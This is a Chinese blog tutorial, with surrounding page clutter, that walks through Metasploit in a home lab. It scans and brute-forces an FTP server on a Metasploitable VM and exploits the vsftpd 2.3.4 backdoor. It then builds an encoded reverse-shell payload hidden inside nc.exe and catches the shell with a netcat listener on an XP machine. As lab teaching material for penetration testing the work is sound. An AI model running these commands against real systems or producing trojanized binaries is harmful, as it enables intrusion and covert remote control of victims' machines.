Metasploit framework(三)——exploit模块及payload模块独立实战

最新推荐文章于 2023-12-04 19:19:19 发布
最新推荐文章于 2023-12-04 19:19:19 发布
阅读量1k 收藏 4
点赞数
分类专栏: security 文章标签: meatsploir frame
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jack0610/article/details/88827702
版权

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

 

首先说exploit模块及其实战效果:

1、Active exploit (主动)
触发方式:攻击者发起攻击并且发动payload执行,得到shell(即主动提交漏洞利用代码,从而达到利用漏洞)

2、Passive Exploits (被动)
触发方式:诸如客户端访问服务器,当服务器存在漏洞利用代码,而客户端有漏洞,客户端访问服务器被服务器的利用代码攻击,从而造成客户端shell给服务器 。典型的就是社会攻击。

注意:不管什么方法,都是加载payload使攻击效果达到

实战用到的工具:kali、metasploitable靶机、

使用的命令:

- search ftp
- use auxiliary/scanner/ftp/ftp_version
    set RHOSTS 172.20.10.13
    run
- use auxiliary/scanner/ftp/anonymous
    set RHOSTS 172.20.10.13
    run
- use auxiliary/scanner/ftp/ftp_login
    set RHOSTS 172.20.10.13
    set USERNAME msfadmin
    set PASSWORD msfadmin
    run
- search 234
#注意这里的234是ftp_version扫描出来的版本号
-use exploit/unix/ftp/vsftpd_234_backdoor
    set RHOSTS 172.20.10.13
    run
- uname -a

效果图如下:

上面便可。

接下来说直接使用payload达成效果实战演示:

用到的tool:kali、xp

使用到的命令:

- show payload
- use payload/windows/shell_reverse_tcp
    set LHOST 172.20.10.11
-generate -h
-generate -b '\x00\xff' -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/ share/windows-binaries/nc.exe -o /root/nc.exe       #这里的意思是:去掉payload的坏字符指定为exe格式,然后进行5次加密,指定成注入方式并且注入到一个nc程序中,最后将生成结果导出到/root/nc.exe这个里面。

效果图:

将生成的可执行程序拷贝到xp中: 

 在本机端建立侦听程序:

nc -nvlp 4444

一旦xp中执行nc程序,那么侦听在本机的侦听端口将得到xp反弹回客户端的shell,取得对方shell执行操作。

注意:一旦当可执行程序在xp端被关闭,那么本地shell也将结束。

 

Jeromeyoung666
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Mastering-Metasploit:掌握Metasploit书中的Metasploit模块
05-17
此存储库包含《掌握Metasploit手册》中涵盖的模块: #要将所有模块自动加载到metasploit: ./msfrun.sh #手动方法#加载所有核心metasploit模块(开发,辅助,发布): msf>加载路径/ root / Desktop / Mastering-Metasploit / modules / 加载了12个模块: 2 auxiliarys 3 posts 7 exploits #要加载所有meterpreter脚本: 将所有模块从book_meterpreter_scripts复制到/ usr / share / metasploit-framework / scripts / meterpreter
Metasploit基础教程和简单使用
qq_41344881的博客
08-07 668
一、工具概述#二、使用方法#、常用命令#四、举例使用。
Metasploit渗透测试的漏洞利用和攻击方法
Kali与编程
12-04 1915
其中exploit用于利用系统中的漏洞来执行特定的攻击操作,auxiliary用于扫描和收集目标主机的信息,post用于在目标主机上执行后续的攻击操作,payload则是用于在目标主机上执行特定的攻击操作的载荷。exploit/windows/smb/ms17_010_eternalblue模块Metasploit中的一个著名漏洞利用模块,用于利用Windows SMB服务中的EternalBlue漏洞。Metasploit模块选项用于设置模块的参数,通常包括目标主机的IP地址、端口号、攻击载荷等信息。
深入理解metasploitpayload
合天网安学院
04-03 631
Metasploit- Payload简单来说,Payload是黑客用来与被黑了的系统交互的简单脚本。使用payload,可以将数据传输到已经沦陷的系统。Metasploit有效载荷可以...
Metasploit payloads模块理解
weixin_45626840的博客
03-16 895
Metasploit 通过规范化 exploit 和 shellcode 之间的接口把漏洞利用的过程封装成易用的模块, 大大减少了 expliot 开发过程中的重复工作, 深刻体现了代码重用和模块化、结构化的思想。植入代码之前需要做大量的调试工作,例如,弄清楚程序有几个输入点,这些输入将最终会当作哪个函数的第几个参数读入到内存的哪一个区域,哪一个输入会造成栈溢出,在复制到栈区的时候对这些数据有没有额外的限制等。exploit 的核心是淹没返回地址, 劫持进程的控制权, 之后跳转去执行 shellcode。
metasploit基础命令介绍
xxx9686的博客
09-16 799
msfvenom(融合了msfpayload、msfencode 的所有功能)、msfpayload(新版本已取消)、msfencode(新版取消)五.编码器模块(encode):攻击载荷与空指令模块组装完成一个指令序列后,在这段指令被渗透攻击模块加入邪恶数据。四.空指令模块(Nop):空指令(NOP)是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,.攻击载荷模块(payload):攻击载荷是在渗透攻击成功后促使目标系统运行的一段植入代码。
Metasploit——渗透攻击模块(Exploit)
m0_62063669的博客
08-10 2972
开放21,ftp,称为ftp服务器)。A发送某种类型的漏洞利用代码给B,这个漏洞利用代码利用之后,加载payload,在B。-b排除坏字符,-t输出文件格式,-e指定encoder,-i使用5轮,-k线程,-x模板,-f输出文件。exploits漏洞利用的代码,由于B请求A,就作为A的响应报文把漏洞利用代码内容返回给。判断主动还是被动,是看漏洞利用代码,是主动发过去的,还是被动等待客户端连接服务器端而造成客户端漏洞被利用。2.本地不侦听端口,反弹连接给A侦听的另外一个端口,连接后,B就把shell给A。..
4. MetasploitExploit模块
qq_41860876的博客
04-17 823
Active Exploit 主动的 某种服务器开放的端口,攻击者主动发起漏洞利用代码,比如反弹shell代码执行,拿到目标shell 主动的就是主动发起漏洞利用代码 Passive Exploit被动的 ...
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
0x13.第十MetaSploit实战使用各类探测模块.pdf
06-24
0x13.第十MetaSploit实战使用各类探测模块.pdf
Metasploit-The Exploit Learning Tree
10-18
Metasploit-The Exploit Learning Tree 20171018下载,本来想免费共享,结果系统设定最小值2个资源分
metasploitframework框架
09-28
metasploit-framework-V6.1.8适用于Windows系统。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
MASTERING_METASPLOIT_THIRD_EDITION_metasploitframework_
10-02
Mastering Metasploit Framework
metasploit学习之路() exploit+payload攻击载荷+metepreter(介绍)
Sea_Sand息禅
07-07 2192
一、exploit介绍 exploit是利用漏洞对目标进行攻击的模块,通过信息的手机及漏洞的验证等,使用相应的exploit对目标机进行漏洞攻击。也就是我么常说的漏洞利用exp。 exploit可有主动和被动两种。 主动:利用合适的exploit对目标机进行攻击 被动:类似于钓鱼,等待用户对我们的诱饵链接等进行操作我们才能攻击成功。 二、payload介绍 payload是msf生成的有效载荷,可...
payloadexploit的区别
weixin_34290096的博客
04-02 1203
2019独角兽企业重金招聘Python工程师标准>>> ...
一句话解释shellcode、payloadexploit
qq_34304107的博客
02-25 1468
shellcode是一系列指令 payload是实现如何连接shell,或者控制靶机做什么操作的一段shellcode exploit是一段携带payload的,对特定漏洞的利用代码 用一句话概括变为:exploit包含payloadpayload由shellcode组成。...
【内网渗透】MSF的exploit和pyload的基础使用
qq_37870222的博客
04-24 1485
【内网渗透】MSF的exploit和pyload的基础使用1、连接MSFroot@kali:~# msfconsole2、显示所有攻击模块msf > show exploits |more3、寻找攻击模块msf > search ms08_0674、使用攻击模块msf > use /exploits/windows/tftp/tftpd32_long_filename5、显示pa...
MSF基本使用(基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 5772
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
实验-、数据库安全性(目的、要求和模板).doc
最新发布
04-24
实验-、数据库安全性(目的、要求和模板).doc
msf 文件上传漏洞 模块使用案例
06-06
MSF(Metasploit Framework)是一款功能强大的渗透测试工具,其中包含了很多漏洞利用模块。其中,文件上传漏洞是常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件,从而控制目标系统。下面是一个使用MSF的文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jeromeyoung666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值